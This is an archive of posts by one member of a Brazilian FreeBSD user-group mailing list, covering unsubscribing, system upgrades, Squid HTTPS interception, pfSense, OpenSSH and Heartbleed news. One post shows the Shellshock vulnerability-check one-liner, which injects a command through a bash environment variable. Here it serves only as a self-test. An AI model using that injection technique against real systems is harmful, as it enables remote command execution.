Re: [FUG-BR] Quero sair da lista

[Welkson Renny de Medeiros]

Em seg., 10 de fev. de 2020 às 19:49, Gilberto F da Silva <2458...@gmail.com>
escreveu:

> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>   Há esse link para retirar o nome da inscrição porém, há
>   meses venho tentando e a página está sempre inacessível.
>
>
Envia e-mail para freebsd-unsubscr...@fug.com.br ou acesse [1] (https não
está funcionando), informe seu e-mail e clique em "Desinscrever".

[1] http://www.fug.com.br/mailman/listinfo/freebsd

Att.,
-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OOF-TOPIC] Re: Lista

[Welkson Renny de Medeiros]

Em 19 de fevereiro de 2018 11:14, Fábio Rodrigues Ribeiro <
lis...@farribeiro.com.br> escreveu:

> Em 19-Feb-18 11:08, Welkson Renny de Medeiros escreveu:
>
>> Em 19 de fevereiro de 2018 10:58, Fábio Rodrigues Ribeiro <
>> lis...@farribeiro.com.br> escreveu:
>>
>> E criaram...
>>>
>>> https://t.me/fug_br
>>>
>>> fu...@googlegroups.com
>>>
>>> Abraços.
>>>
>>>

A ideia de grupos em WhatsApp e Telegram para discussões técnicas eu acho
bem estranho. Participo de 2 grupos no Telegram, um de BSD (esse aí), e
outro de Ceph... são MUITAS mensagens, sem histórico (ou histórico
confuso), muito off-topic, etc... prefiro o old-school das listas, apesar
de não ser "real-time" como o chat.

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OOF-TOPIC] Re: Lista

[Welkson Renny de Medeiros]

Em 19 de fevereiro de 2018 10:58, Fábio Rodrigues Ribeiro <
lis...@farribeiro.com.br> escreveu:

> E criaram...
>
> https://t.me/fug_br
>
> fu...@googlegroups.com
>
> Abraços.
>


Com o FUG de volta, creio não fazer sentido manter 2 listas (o histórico da
lista FUG é bastante rico).

O negócio é ficar por aqui, e tentar contribuir de alguma forma para que a
lista continue de pé (auxiliar na manutenção dos servidores, auxílio
financeiro para hospedagem da VM se for o caso, etc.).

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Lista voltou à ativa?

[Welkson Renny de Medeiros]

Em 15 de fevereiro de 2018 10:46, Eduardo Schoedler 
escreveu:

>
> >
> > Acredito que ela nunca tenha parado, apenas diminuiram as perguntas ou o
> > interesse no assunto :(
>
> Acredito que não, pois estou recebendo uma enxurrada de e-mails desde
> essa noite.
>
> --
> Eduardo Schoedler
>
>

Ficou parada por alguns meses. Problemas no mailman. Brandi explicou no
grupo do Telegram.

Vida longa ao FUG ;-)

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Automação e gerenciamento de configuração no FreeBSD

[Welkson Renny de Medeiros]

Em 15 de fevereiro de 2018 02:08, Paulo Henrique 
escreveu:

> Em 15 de fev de 2018 01:56, "Adiel de Lima Ribeiro" <
> adiel.netad...@gmail.com> escreveu:
>
> Bom dia, lista.
> De minhas pesquisas eu ví que o Chef e o Puppet não são totalmente
> compatíveis com o FreeBSD e não é possível executá-los sobre o FreeBSD.
> Sendo assim, segue minha dúvida:
> Qual ferramenta vocês utilizam para lidar com isso em seus parques de
> servidores FreeBSD?
> Obrigado.
>
> --
> Best regards;
> Adiel de Lima Ribeiro
> AWS Certified Solutions Architect
> Specialist in Linux Network Administration
> Microsoft Certified Systems Administrator
> +55 (31) 98961-5984
> http://nuvym.com/



Ansible [1] e Fabric [2] creio que funcionam bem.

[1] https://www.ansible.com/
[2] http://www.fabfile.org/

Att.,

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Lista com problemas?

[Welkson Renny de Medeiros]

Amigos,

FUG está com problemas?

Outras colegas comentaram no MASOCH-L e decidi testar.

-- 
Welkson
PGP Key ID: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Monitorar consumo do Link

[Welkson Renny de Medeiros]

Em 5 de maio de 2016 15:26, Enio Marconcini  escreveu:

> Olá boa tarde amigos.
> Alguém recomenda um software que me permita, não só ver o consumo atual que
> está passando no momento, mas o consumo total já trafegado,
> algo parecido que o comando "systat -ifstat" mostra, porém que me permita
> medir o que foi trafegado no dia, semanal ou mensal?
>
> Das ferramentas que eu conheço (cacti, mrtg, ntop, trafshow) não sei se
> exibem essa informação ou essa possibilidade.
>
> Att
>
>

O bandwidthd atenderia?
http://bandwidthd.sourceforge.net/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Gravação Palestra: Do meio do mato pro meio do BSD!

[Welkson Renny de Medeiros]

Em 3 de fevereiro de 2016 12:24, Jack  escreveu:

> Buenas!
>
> Se for isso, aqui: https://youtu.be/kQoCRp_Ac88?t=1773
>
> []`s
> Jack
>
>

Que massa! Parabéns garga! Motivador sua história!

Eu também vim do meio do mato (sertão do RN rsrs) e me identifiquei
bastante com sua história (ler "man" impresso, entre outros).

Abraços,

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Sr. Moderador me tire da lista

[Welkson Renny de Medeiros]

Em 27 de março de 2015 15:20, Eduardo Schoedler lis...@esds.com.br
escreveu:

 Em 27 de março de 2015 14:57, Ricardo Romero ricromer...@gmail.com
 escreveu:

  Já tentei várias vezes mas não consigo.
 
  A página da web em https://www.fug.com.br/mailman/listinfo/freebsd pode
  estar temporariamente indisponível ou pode ter sido movida
 permanentemente
  para um novo endereço da web.
  Código de erro: ERR_CONNECTION_CLOSED



Acesse usando HTTP em vez de HTTPS:
http://www.fug.com.br/mailman/listinfo/freebsd

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Squid com https

[Welkson Renny de Medeiros]

Em 5 de março de 2015 18:18, MrBiTs mrbits@gmail.com escreveu:


 Se você configurar o squid direito (como me parece que fez) E (e esse é um
 grande E) colocar no mesmo .pem tanto a chave, o
 certificado e o certificado intermediário da Startcom, sim, tudo deve
 funcionar. Eu tenho certificados deles falando com Google,
 Facebook e outros serviços.



Grande MrBiTs, beleza? Ajude-me a entender melhor essa solução.

Você precisou instalar esse certificado no navegador das máquinas?

Pelo que sei, a StarSSL não permite você gerar um certificado wildcard a
nível de domínio, ex: *.* (sub-domínio acredito que deixa, ex: *.
minhaempresa.com.br). PS: pelo que lembro no caso da Lenovo (Superfish) os
caras instalavam um certificado wildcard no navegador do usuário.

Ainda estou lendo sobre certificate pinning [1], mas pelo que vi ele
associa o certificado ao host com uma chave que só o responsável pelo
domínio teria acesso... o site até pode abrir em MITM, mas o navegador
deveria gerar algum tipo de alerta (pelo menos no Chrome e Firefox) ou
não?

Se eu estiver engando, e se você puder, indique algum material para que eu
possa entender melhor essa solução.

[1] https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Squid com https

[Welkson Renny de Medeiros]

Em 5 de março de 2015 20:34, Welkson Renny de Medeiros welk...@gmail.com
escreveu:

 Em 5 de março de 2015 18:18, MrBiTs mrbits@gmail.com escreveu:


 Se você configurar o squid direito (como me parece que fez) E (e esse é
 um grande E) colocar no mesmo .pem tanto a chave, o
 certificado e o certificado intermediário da Startcom, sim, tudo deve
 funcionar. Eu tenho certificados deles falando com Google,
 Facebook e outros serviços.



 Grande MrBiTs, beleza? Ajude-me a entender melhor essa solução.

 Você precisou instalar esse certificado no navegador das máquinas?

 Pelo que sei, a StarSSL não permite você gerar um certificado wildcard a
 nível de domínio, ex: *.* (sub-domínio acredito que deixa, ex: *.
 minhaempresa.com.br). PS: pelo que lembro no caso da Lenovo (Superfish)
 os caras instalavam um certificado wildcard no navegador do usuário.

 Ainda estou lendo sobre certificate pinning [1], mas pelo que vi ele
 associa o certificado ao host com uma chave que só o responsável pelo
 domínio teria acesso... o site até pode abrir em MITM, mas o navegador
 deveria gerar algum tipo de alerta (pelo menos no Chrome e Firefox) ou
 não?

 Se eu estiver engando, e se você puder, indique algum material para que eu
 possa entender melhor essa solução.

 [1] https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning

 Welkson



Complemento para meu e-mail anterior:

http://www.squid-cache.org/mail-archive/squid-users/201409/0002.html

http://security.stackexchange.com/questions/52645/legitimate-use-case-of-man-in-the-middle-attack-for-dpi

4. Yep Certificate pinning will cause problems with this and is becoming
more common as time goes by. The way this works is that the browser knows
of a specific certificate or set of certificates that it trusts for a given
hostname, and it won't base that trust on certificates being issued by a
known CA. I'm not aware of a way past that problem.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Squid com https

[Welkson Renny de Medeiros]

Em 5 de março de 2015 13:04, MrBiTs mrbits@gmail.com escreveu:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256

 On 03/05/2015 12:54 PM, Renata Dias wrote:
  Boa tarde a todos !
 
  Fiz várias pesquisas no Google e também na FUG com relação a este
 assunto Squid com https. Gerei um certificado informal e
  consegui configurar meu Squid para filtrar os acessos na porta 443,
 porém ainda tenho problemas com o acesso ao Google.



Posso está enganado, mas se não me engano Google usa certificate pinning,
e você não vai conseguir acessar o serviço deles usando certificados
auto-assinados.

A saída é colocar uma exceção na regra do firewall para que a faixa de IP
do Google não seja enviada para o proxy.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 8.4

[Welkson Renny de Medeiros]

Em 24 de fevereiro de 2015 15:20, Renato Botelho rbga...@gmail.com
escreveu:

 Márcio,

 portupgrade é concorrente do portmaster e não do pkg. O pkg você vai
 acabar usando direta ou indiretamente. Na árvore de ports atual (seja no
 8.4 ou no 10), quando você executa um ‘make install’ em um port, ele
 instala os arquivos dentro de PORTDIR/work/stage, cria um pacote binário
 .txz e instala esse pacote usando pkg, ou seja, o pkg *sempre* será usado.

 Tanto o portupgrade quanto o portmaster continuam funcionando do mesmo
 jeito que sempre funcionaram até onde eu sei, e eles servem pra atualizar
 ports compilando a partir do src usando a árvore do ports.

 O pkg também serve para instalar pacotes binários, nesse caso é bem mais
 rápido pois não compila local, mas, em contrapartida, é menos flexível,
 pois hoje são gerados pacotes apenas compilados com as OPTIONS default.

 Então eu diria que, se você vai usar todos os pacotes com OPTIONS default,
 vá de pkg com pacotes binários. Se você precisa selecionar OPTIONS não
 default, aí a escolha é sua, portupgrade (que eu já não uso há muitos anos
 e não sei como anda) ou portmaster.

 --
 Renato Botelho



Garga, outro dia estava pensando em abrir uma thread para perguntar
exatamente pelas OPTIONS... maioria dos ports que instalo funcionam bem com
options default, outros não (Squid por exemplo, onde preciso especificar
qual proxy transparente pretendo usar, via pf, ipfw, etc.).

Meu server está com FreeBSD 9.1-RELEASE, e o EoL já se foi desde de
12/2014... como está em uma máquina virtual, estou pensando em clonar e
fazer testes de migração para uma versão mais atual.

Att.,

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Fwd: FreeBSD Now Available on DigitalOcean

[Welkson Renny de Medeiros]

2015-01-14 16:54 GMT-03:00 Fabricio Lima lis...@fabriciolima.com.br:

 So pra constar, caso precisem, na AWS da amazon suporta BSD 10.1 tb (desde
 nov/2012)

 https://aws.amazon.com/marketplace/pp/B00KSS55FY

 [ ]'s
 Fabricio Lima


No caso da AWS, o problema é que o suporte não é oficial, e sim um port
desenvolvido pelo Perciva:
http://www.daemonology.net/freebsd-on-ec2/

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] Fwd: FreeBSD Now Available on DigitalOcean

[Welkson Renny de Medeiros]

Notícia excelente!

Welkson


-- Forwarded message --
From: Andrew Starr-Bochicchio ast...@digitalocean.com
Date: 2015-01-14 15:01 GMT-03:00
Subject: FreeBSD Now Available on DigitalOcean
To: freebsd-cl...@freebsd.org


Hi all,

I'm glad to be able to announce that FreeBSD 10.1 is now available for
use on DigitalOcean. This has been one of the most requested features
on our UserVoice page, so we're excited to finally bring it out.
There's more information in this blog post by Neal Shrader, a member
of our engineering team. [0]

I'm subscribed to this list, and would love to hear any feedback you
might have or answer any questions.

[0]
https://www.digitalocean.com/company/blog/presenting-freebsd-how-we-made-it-happen/

Thanks!

- Andrew Starr-Bochicchio
  Community Manager
  DigitalOcean
ᐧ
___
freebsd-cl...@freebsd.org mailing list
https://lists.freebsd.org/mailman/listinfo/freebsd-cloud
To unsubscribe, send any mail to freebsd-cloud-unsubscr...@freebsd.org



-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] fork do pfSense

[Welkson Renny de Medeiros]

Em 6 de janeiro de 2015 09:12, Rafael Aquino raf...@lk6.com.br escreveu:


 Bom dia a todos...

 Eu não conhecia esta ferramenta, e como fã do PFSense prontamente instalei
 (agora a pouco)

 Bom, tem que ser um fork aprovado, pois instalação e todas as features são
 iguais...

 Gostei da skin, que é MUITO mais bonita...

 Mas até o momento senti falta de um recurso vital: o gerenciador de
 pacotes...
 E também da tradução para português.

 No mais, parece bem estável (de novo: são os mesmos recursos do pfsense em
 um FreeBSD 10.0 p15).

 Mas vou explorar mais e posto minhas impressões.

 Abraços!!!

 ---
 Rafael Mentz Aquino
 LK6 Soluções em TI



Rafael, bom dia!

Acho que só precisa de autorização se for usar o nome pfSense.

Ou estou enganado?

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Welkson Renny de Medeiros]

Em 24 de dezembro de 2014 14:22, Fabricio Lima lis...@fabriciolima.com.br
escreveu:

 eu voto no alvarenga!!

 [ ]'s
 Fabricio Lima
 When your hammer is C++, everything begins to look like a thumb.



Pow pessoal, a intenção era discutir tecnicamente o assunto! Indiferente
da linguagem do gueto, maloqueiro, culta, l33t, etc. ( vocês são
demais);

Obrigado pelas dicas Evandro.

Bem que eksffa poderia nos brindar com a última aula de BSD de 2014 =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] Security : OpenBSD x FreeBSD

[Welkson Renny de Medeiros]

Estava vendo o twitter ontem e me deparei com esse post:
http://networkfilter.blogspot.com.br/2014/12/security-openbsd-vs-freebsd.html?m=1

No Reddit tem alguns comentários:
http://www.reddit.com/r/netsec/comments/2ph03s/security_openbsd_vs_freebsd/

Ainda estou lendo o post... mas vejo com bons olhos esses comparativos,
pois nos mostra onde estamos errando (se é que estamos, pois muitas das
tecnologias apresentadas são novidades pra mim =).

flames  /dev/null

-- 
Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Servidor de música

[Welkson Renny de Medeiros]

Em 7 de dezembro de 2014 19:44, Thiago Gomes thiagome...@gmail.com
escreveu:

 Galera,

 Gostaria de saber como implemento um servidor de música para uma loja. A
 empresa  tem várias filiais ligada via fibra, ele deseja usando o Windows
 player ou até mesmo o browser fazer tocar essas músicas.

 Thiago.



ICECast não ajudaria?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Ferramentas para análise de performance

[Welkson Renny de Medeiros]

Esse Brendan Greg trabalha na Netflix, e lá usa muito FreeBSD.

No site dele tem vários slides legais sobre performance em *unix.

No link abaixo tem as sugestões de ferramentas:
Now with a BSD kernel :-) FreeBSD perf observ tools for @MeetBSDCA
http://twitter.com/brendangregg/status/525707800584810496/photo/1

O site dele é esse:
http://brendangregg.com

Welkson
PGP: D092C683
* usando smartphone
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] Falha no BASH (possível exploração remota)

[Welkson Renny de Medeiros]

Dia.

Já testaram?

welkson@fw ~ % env x='() { :;}; echo vulnerable'  bash -c echo this is a
test
vulnerable
this is a test

Mais detalhes:
http://portaudit.freebsd.org/71ad81da-4414-11e4-a33e-3c970e169bc2.html
https://access.redhat.com/articles/1200223
https://marc.info/?l=oss-securitym=141157106132018w=2

Migrei a pouco tempo para o pkg, e estou apanhando quando tento
atualizar com pkg install bash, o treco me oferece atualização de um monte
de PHP antigo (estou usando 5.5 instalado via /usr/ports/lang/php55* e o
pkg me oferece atualização para o 54, ou seja, mais velho). Preciso parar e
entender esse tal pkg =)

-- 
Welkson
PGP: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Erro sonewconn

[Welkson Renny de Medeiros]

Em 27 de agosto de 2014 16:29, Jorge Petry - BSD jo...@bsd.com.br
escreveu:


 Em 26/08/2014 15:33, Luiz Otavio O Souza escreveu:

  On 26 August 2014 10:55, Jorge Petry - BSD wrote:

 Bom dia pessoal.

 Alguém ja passou por esse tipo de erro?
 Estão aparecendo nos logs e dmesg. Possuo 02 Servers com Freebsd
 10-RELEASE
 rodando jails e aparece nos 2.


 sonewconn: pcb 0xf80265003dc8: Listen queue overflow: 151 already in
 queue awaiting acceptance
 sonewconn: pcb 0xf80177664188: Listen queue overflow: 8 already in
 queue



Uma curiosidade... você aplicou essa regra no sysctl do host ou do jail?

Como jail é um ambiente isolado, provavelmente tem seu próprio sysctl.

Fazendo uma analogia com virtualização, o que quero saber é se você aplicou
o sysctl no HOST ou no GUEST.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 9.0 - 10.0

[Welkson Renny de Medeiros]

Em 7 de agosto de 2014 14:32, Paulo Henrique - BSDs Brasil 
paulo.rd...@bsd.com.br escreveu:

 Atualizei a minha estação de trabalho no final de semana da versão 9.2
 para a 10 STABLE e não tive nenhum problema no processo, contudo ja havia
 migrado para o pkg antes da atualização.
 Os passos foram os seguintes :

 Atualizar o subversion
 Remover o /usr/src


Paulo, estou com uma dúvida, você removeu o /usr/src e já fez o make
buildworld? Não tem um svn checkout antes desse make buildworld?



 make buildworld ( é requerimento para qualquer troca de major release)
 make buildkernel KERNCONF=MYKERNEL
 make installkernel KERNCONF=MYKERNEL
 mergemaster -iFp
 reboot
 make installworld
 mergemaster -Fp
 reboot
 make delete-old-lib
 make delete-old-dir
 reboot


Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 9.0 - 10.0

[Welkson Renny de Medeiros]

Em 4 de agosto de 2014 14:24, Edinilson - ATINET edinil...@atinet.com.br
escreveu:

 Eu sempre utilizo os metodos descritos aqui:
  http://www.bsdnow.tv/tutorials/stable-current

 E, na parte do kernel, dificilmente tenho maiores problemas.

 O que SEMPRE tenho problemas sao com os ports. O perl e suas bibliotecas é
 um bom exemplo.
 Do 9 para o 9.3 eu tive problemas TAMBEM com o smokeping, esteja preparado.

 Edinilson



Excelente link Edinilson. Obrigado!

Esse BSD que pretendo atualizar fica um pouco distante, estava pensando em
fazer remotamente (coragem está pouca :p).

O bom é que esse BSD está virtualizado (ESXi 5.1), posso fazer um snapshot
antes de tentar atualizar, e qualquer bronca dar um revert.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF - Pfsense] Vouchers Captivel Portal

[Welkson Renny de Medeiros]

Em 4 de agosto de 2014 15:47, Deny Santos deny.san...@gmail.com escreveu:

 Boa tarde , gostaria de ver se alguém conhece alguma forma de gerar os
 vouchers do pfsense sem ter que logar nele com usuario administrador ,
 pergunto pois preciso que uma recepcionista fique gerando os tickets, ja vi
 o FreeRadius que tem como fazer também pois ele salvaria a base dele no
 mysql e depois eu pegaria com um php tranquilamente .

 Alguma sugestão ?

 Obrigado



Um amigo tempos atrás me fez essa pergunta, fiz algumas pesquisas rápidas e
encontrei isso:
http://www.pfsensevp.portalavis.net/
https://github.com/vatesfr/selkie
https://github.com/jpardobl/pfsense_vouchers_rest

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] upgrade 9.0 - 10.0

[Welkson Renny de Medeiros]

Em 30 de julho de 2014 08:41, Marcelo da Silva marc...@mginformatica.com
escreveu:

 bom dia.

 tenho uma instalacao com versao 9.0 do  FreeBSD

 gostaria de fazer upgrade para versao 10 .

 a instalacao é simples, so mysql55 php e apache.

 qual o procedimento correto ?
 principalmente que agora usa svn e eu ainda do meio confuso com isso .



Considerando o EoL estou pensando em migrar meu 9 para 9.3:
http://www.freebsd.org/security/

Sua pergunta foi bem pertinente Marcelo. Apesar de gostar (e usar) bastante
o Google, existe várias formas de atualizar o BSD (svn, freebsd-update,
etc.), e não custa pedir opinião aos amigos mais experientes.

O meu tem bastante serviço rodando (sei que não é uma boa prática)... estou
criando coragem de fazer o upgrade =)
Att.,

-- 
Welkson
PGP: D092C683
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] - Lista/Site de registro de malwares

[Welkson Renny de Medeiros]

Em 16 de julho de 2014 14:29, Ricardo Tweeg rtw...@yahoo.com.br escreveu:



 Boa tarde a todos,

 Desde já peço desculpas pelo assunto ser off-topic.

 Gostaria de saber se alguém da lista poderia me indicar algumas
 listas/sites gratuitos de registros de malwares.
 Seria a mesma coisa que temos hoje em dia com os spamns, onde listas/sites
 registram os emails, domínios e Ip´s que fazem spamns.
 No momento só encontrei as listas/sites cobertos pelo site www.abuse.ch.

 Caso conheçam mais alguns que fosse de qualidade e free, ficaria grato
 pela ajuda.

 Abraços



Tempos atrás usei essa:
http://www.malware.com.br/

Não sei se continua sendo atualizada.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFFTOPIC] Indicação de colocation

[Welkson Renny de Medeiros]

Em 26 de maio de 2014 13:10, Celso Viana celso.via...@gmail.com escreveu:

 Tem que ser BSD? Se sim, o rootbsd.com parece bom.

 Amazon AWS tem BSD (FreeBSD)?

 --
 Celso Vianna
 BSD User: 51318
 http://www.bsdcounter.org



Oficialmente não.

Mas algumas pessoas usam as imagens que o Perciva disponibiliza:
http://www.daemonology.net/freebsd-on-ec2/

O tarsnap.com usa FreeBSD e está hospedado na Amazon.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd: [GTER] pfSense - not open source anymore

[Welkson Renny de Medeiros]

Em 22 de maio de 2014 11:04, Christopher Giese bs...@bsdux.com.brescreveu:


 Em 22/05/2014 10:50, Renato Botelho escreveu:
  2014-05-22 10:40 GMT-03:00 Lucas Dias lucas...@gmail.com:
  Em 22 de maio de 2014 10:13, Nicolas Wildner nico...@tbl.com.br
 escreveu:
 
  O problema é o seguinte
 
  1 - pfSense é uma marca registrada da Electric Sheep Fencing.
  2 - As pessoas começaram a fazer forks do projeto, sem ao menos
  ter a decência de mudar o nome do fork com relação ao original
  3 - pfSense remove suas ferramentas de buildar pfSense
  4 - Lançam a informação de que haverá uma versão comercial e
  outra community(não sei se opensource ou freeware)



Em mais de um post vi o pessoal comentando que o FreeBSD também terá um CLA
[1], parecido com o pfSense [2]:

[1] https://forum.pfsense.org/index.php?topic=77038.0(You should
probably be aware that a CLA is coming to FreeBSD as well.)
[2] https://portal.pfsense.org/members/signup/ICLA

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] [FYI] Fwd: De Raadt + FBSD + OpenSSH + hole?

[Welkson Renny de Medeiros]

Pessoal,

Desculpe-me pela pergunta newbie, mas o OpenSSH que o FreeBSD usa não é o
MESMO do OpenBSD? Ou o FreeBSD fez algum tipo de fork?

. as long as you aren't using FreeBSD or a derivative (hint: Jupiper),
you are fine.  That's the only place I know of an OpenSSH hole. 

flames  /dev/null (saudoso Irado =)

Welkson



-- Forwarded message --
From: Todor Todorov todo...@paladin.bulgarpress.com
Date: 2014-04-13 19:38 GMT-03:00
Subject: De Raadt + FBSD + OpenSSH + hole?
To: freebsd-secur...@freebsd.org


Hi everyone,
I came across this :

https://groups.google.com/forum/#!topic/mailing.openbsd.tech/xALfxxR3oKo

 You are welcome.  Stuart Henderson wrote the draft, but he forgot that
part, and Damien Miller and I realized it was needed.  We sensed there
might be some ambiguity...  we'll take care the next time an
OpenOffice problem also.

... as long as you aren't using FreeBSD or a derivative (hint: Jupiper),
you are fine.  That's the only place I know of an OpenSSH hole.

Oh now I sense some angst.  Please ask Kirk McKusick, he knows the
story about why this is not being disclosed to FreeBSD.  Sometimes I
feel a bit sorry for them (and for him), but then the next minute I
don't feel sorry because there's damn good reasons they won't be
told about what I found.

Does that answer help?  Hope so.

Any guidance here?
___
freebsd-secur...@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to freebsd-security-unsubscr...@freebsd.org
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [FYI] Fwd: De Raadt + FBSD + OpenSSH + hole?

[Welkson Renny de Medeiros]

Em 15 de abril de 2014 13:17, Patrick Tracanelli 
eks...@freebsdbrasil.com.br escreveu:



 On 15/04/2014, at 12:18, Renato Botelho rbga...@gmail.com wrote:

  On Ter, 2014-04-15 at 11:50 -0300, Welkson Renny de Medeiros wrote:
  Pessoal,
 
  Desculpe-me pela pergunta newbie, mas o OpenSSH que o FreeBSD usa não é
 o
  MESMO do OpenBSD? Ou o FreeBSD fez algum tipo de fork?
 
  . as long as you aren't using FreeBSD or a derivative (hint: Jupiper),
  you are fine.  That's the only place I know of an OpenSSH hole. 
 
  flames  /dev/null (saudoso Irado =)
 
  Sim, é o mesmo. O Theo Deraadt gosta de ser polêmico (no mesmo estilo do
  linus torvalds). O alvo da vez é o FreeBSD e a IETF (que não de um
  número de protocolo pro CARP e fez ele ficar bravinho). :)
 
  Se eu fosse você nem esquentava a cabeça com as coisas que ele fala,
  amanhã ele acorda irritado com o linux e muda o foco novamente.

 Olha e pelo pouco que se conhece do Theo, o FreeBSD vai entrar de novo na
 mira dele por causa do CARP no FreeBSD 10, que ficou tão “melhor” que o
 DfBSD está dispensando o carp existente pra usar o do FreeBSD; os caras do
 uCARP (que são dev OpenBSD) estão estudando se da pra fazer o ficar tão
 inerente a interface física como ficou no FreeBSD de forma portável.
 [crop]



Eksffa e Garga, obrigado por mais essa aula =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-Topic] So long and thanks for all the fish

[Welkson Renny de Medeiros]

Em 14 de abril de 2014 11:48, Daniel Bristot de Oliveira 
danielbris...@gmail.com escreveu:

 Opa!

 Hoje tirei um tempo para limpar meus e-mails e vi que a muito tempo
 não participo da FUG, então acho justo sair do grupo.

 É a vida, a um tempo atrás resolvi migrar de plataforma por motivos
 profissionais e hoje aqui estou, longe do mundo FreeBSD... estou
 trabalhando em uma bem conhecida empresa norte americana de Linux
 Enterprise.

 Gostaria apenas de agradecer formalmente à FUG e todos os seus
 membros, principalmente os que aqui estavam entre os anos de 2005 à
 2009, por todo o conhecimento, oportunidades e amigos que
 ganhei/tive/fiz por aqui.

 Até logo, e obrigado por todos os peixes!
 --
 Daniel Bristot de Oliveira



Valeu professor! Boa sorte nessa nova empreitada.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Fwd: [FreeBSD-Announce] HEADSUP! OpenSSL Heartbleed bug]

[Welkson Renny de Medeiros]

Em 10 de abril de 2014 12:57, Enrique Fynn enriquef...@gmail.com escreveu:

 Atenção especial aos servidores rodando FreeBSD, foram os únicos que
 um atacante conseguiu extrair a chave privada do ssl pelo bug. A fonte
 não é das mais confiáveis (Twitter) [0], mas não vejo razão para que
 não seja verdadeira.

